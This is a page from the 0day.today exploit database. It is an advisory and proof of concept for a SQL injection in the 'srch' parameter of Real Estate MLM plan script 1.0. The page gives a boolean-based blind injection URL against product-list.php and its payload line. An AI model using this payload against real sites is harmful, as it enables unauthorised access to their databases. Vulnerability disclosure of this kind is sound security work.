[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Real Estate MLM Plan Script 1.0 SQL Injection Vulnerability

Author
8bitsec
Risk
[
Security Risk High
]
0day-ID
0day-ID-28710
Category
web applications
Date add
02-10-2017
Platform
php
# Exploit Title: Real Estate MLM plan script v1.0 - 'srch' Parameter SQL Injection
# Date: 2017-09-28
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.mlmscript.in/
# Software Link: http://www.mlmscript.in/real-estate-mlm-script.html
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
 
Release Date:
=============
2017-09-28
 
Product & Service Introduction:
===============================
Real Estate MLM plan script we have used influential and having advanced secure database system here, that will help protect your user's sensitive details from outside attackers here we use newest technology to develop this Real Estate script.
 
Technical Details & Description:
================================
 
SQL injection on [srch] parameter.
 
Proof of Concept (PoC):
=======================
 
SQLi:
 
http://localhost/[path]/product-list.php?srch=search AND 3233=3233 AND 'NeVc'='NeVc
 
Parameter: srch (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: srch=search' AND 3233=3233 AND 'NeVc'='NeVc

#  0day.today [2024-11-16]  #